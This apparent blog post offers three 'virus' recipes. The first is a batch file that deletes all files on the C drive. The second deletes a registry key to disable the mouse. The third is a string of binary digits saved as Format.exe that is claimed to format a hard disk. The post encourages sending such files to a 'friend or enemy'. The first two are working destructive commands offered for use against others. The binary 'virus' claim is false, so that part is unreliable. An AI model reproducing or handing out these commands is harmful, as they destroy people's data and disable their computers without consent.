Learn To Make some  Dangerous Virus In A Minute



(1)
What this virus will do:

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.



   1. Open Notepad and copy below code into it.
      @Echo off
      Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Note: Change 'C' to any other drive name which you want to delete.




(2) make a virus that disable mouse  


How To Disable Mouse

  1. Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


2. Save this file as  virus.bat
  3. Done you just created your virus.

Warning: Please don't try to run on your own computer  I will not be responsible for any damage done to your computer.




(3) Create Binary Virus To Format Hard Disk


Today i will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

 1. Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000

 2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

Warning: Please don't try to run on your own computer  I will not be responsible for any damage done to your computer.

No comments:

Post a Comment